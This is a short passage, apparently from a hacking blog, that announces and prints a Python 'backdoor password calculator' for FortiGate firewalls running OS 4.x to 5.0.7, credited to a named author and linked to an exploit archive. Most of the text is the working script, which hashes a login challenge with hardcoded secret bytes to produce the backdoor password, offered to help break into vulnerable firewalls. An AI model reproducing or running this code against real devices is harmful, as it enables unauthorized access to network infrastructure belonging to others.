and Exploit was actually released in the wild but it took some efforts to work with like patamiko/termios/msvcrt.
so theprohack.com 's Founder Risahbh Dangwal ported the code to create a quick and dirty password calculator that will help in breakout forinet firewall with Vulnerable Version.
He Tested on Test Firewall and it works perfectly fine.
here is Code:
# Title : Fortigate Backdoor Password calculator # Date : 24 March 2016 # Author : Rishabh Dangwal, original exploit by firstname.lastname@example.org. # Author Homepage : www.theprohack.com # Author Email : email@example.com # Vendor Homepage : www.fortinet.com # Version : FortiGate OS Version 4.x - 5.0.7 import base64 import hashlib print "Enter hash challenge " ; chash = raw_input() pwdhash = hashlib.sha1() pwdhash.update('\x00' * 12) pwdhash.update(chash + 'FGTAbc11*xy+Qqz27') pwdhash.update('\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70') fhash = 'AK1' + base64.b64encode('\x00' * 12 + pwdhash.digest()) print "password is %s" %fhash
Link of Code: https://packetstormsecurity.com/files/136430/Fortigate-Backdoor-Password-Calculator.html